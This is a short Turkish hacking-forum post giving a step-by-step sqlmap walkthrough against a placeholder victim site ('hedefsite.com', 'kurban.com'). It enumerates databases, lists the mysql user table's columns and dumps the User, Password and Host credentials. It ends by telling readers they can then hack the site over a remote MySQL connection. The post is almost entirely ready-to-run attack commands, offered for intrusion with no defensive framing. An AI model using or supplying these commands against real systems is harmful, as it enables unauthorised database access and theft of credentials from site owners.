BeyazKaplan
- 9 Ara 2017
- 359 Mesaj
Aktiflik
Seviye
Deneyim
[font='Droid Sans', 'Open Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif]Sqlmap dizinine gelin ve sırasıyla gösterdiğim komutları uygulayın;
sqlmap.py -u "http://www.hedefsite.com/vuln.php?id=5" --threads=10 --random-agent --dbs
![]()
Komutumuzu vererek sitemizin veritabanı bilgilerini öğreneceğiz. Bize burda lazım olacak olan mysql veritabanıdır.
Hemen mysql veritabanındaki tabloları çekiyoruz;
sqlmap.py -u "http://www.hedefsite.com/vuln.php?id=5" --threads=10 --random-agent -D mysql --tables
ve ardından User tablomuzdaki kolonları çekiyoruz;
sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql -T user --columns
Kolonlar geldikten sonra bize gerekli olanları yani User, Password ve Host kolonlarındaki bilgileri çekiyoruz.
sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql -T user -C User,Password,Host --dump
ve bilgiler elimizde, bu bilgiler ile linux da remote mysql bağlantısı yaparak siteyi hackleyebilirsiniz.
--

